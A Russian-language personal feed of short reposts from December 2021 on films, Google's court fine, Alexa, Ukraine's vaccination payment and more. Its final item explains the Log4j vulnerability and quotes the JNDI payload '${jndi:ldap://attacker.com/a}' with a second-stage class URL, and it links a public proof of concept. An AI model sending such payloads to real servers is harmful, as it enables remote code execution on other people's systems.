RA
Пересмотрел "Сердце воина" (1999). Почему-то нравится мне этот фильм.
Выходит Бельдар не убил злого волшебника за отведённые 3 дня, а значит проклятье останется на нём до тех пор, пока кто-то не вырвет его сердце.
RA
RA
Google подала жалобу на решение суда по иску «Царьграда», неустойка по нему через полтора года превысит объем всех денег
https://habr.com/ru/news/t/598239/
Google попросила суд остановить процесс начисления неустойки на время рассмотрения текущей жалобы. Юристы компании прикинули, что через 14 месяцев она будет равна всем российским рублям, находящимся в обороте, а потом еще через месяц превысит все доступные деньги мира.
--
Не счётчик, а штраф
RA
Китайцы натренировали нейронную сеть, так что она по материалам следствия сама шьёт дело и отправляет воронок по нужному адресу.
RA
Amazon закрывает Alexa
https://support.alexa.com/h...ticles/4410503838999
Прошла эпоха
RA
Взрывная "утилизация" Tesla
Когда не хочешь платить 20000 евро за замену аккумулятора.
RA
В России две беды: PulseAudio и NetworkManager
RA
Хотел пересмотреть Матрицу. Вместо этого просмотрел "Судьба человека" 1959 Мосфильм. Годнота, от просмотра не оторваться.
RA
Вакцинированные получили по 1000 грн. Книжные интернет магазины не выдержали и легли.
https://mezha.media/2021/12...-internet-mahazyniv/
--
"А я тєбє говоріл, Люда, што когда-нібудь етот дєнь настанєт, ето будєт, а ти нє вєріла!"
RA
Качественный power metal
https://soundcloud.com/search?q=powerwolf
RA
Куфическое письмо. Когда тебе нельзя рисовать, приходится придумывать такие штуки. И это даже прекрасно.
RA
Как USPS отправлял-отправлял посылку да не выотправил
Второй раз сталкиваюсь с ебучей логистикой в штатах. И это не какие-то стрёмные посредники, это прям международная (читай дорогая) доставка.
RA
Стало понятно как будут раздавать вертолётные 1000 грн #znkpq.
Открываешь спец. карту в своём банке, в приложении Дiя указываешь её реквизиты (опция должна стать доступной с 19 декабря, если конечно же привит).
По МСС банк будет определять можно проводить транзакцию или нет.
https://minfin.com.ua/2021/12/10/76989108/
--
Открыл счёт в Альфе. Жду 19 декабря.
RA
Уязвимость в Apache Log4j, затрагивающая многие Java-проекты
https://www.opennet.ru/open.../art.shtml?num=56319
проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft.
Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
Эксплоит
https://github.com/tangxiaofeng7/apache-log4j-poc
--
Вот эту фичу с загрузкой классов и их выполнению всегда считал какой-то java-дичью.
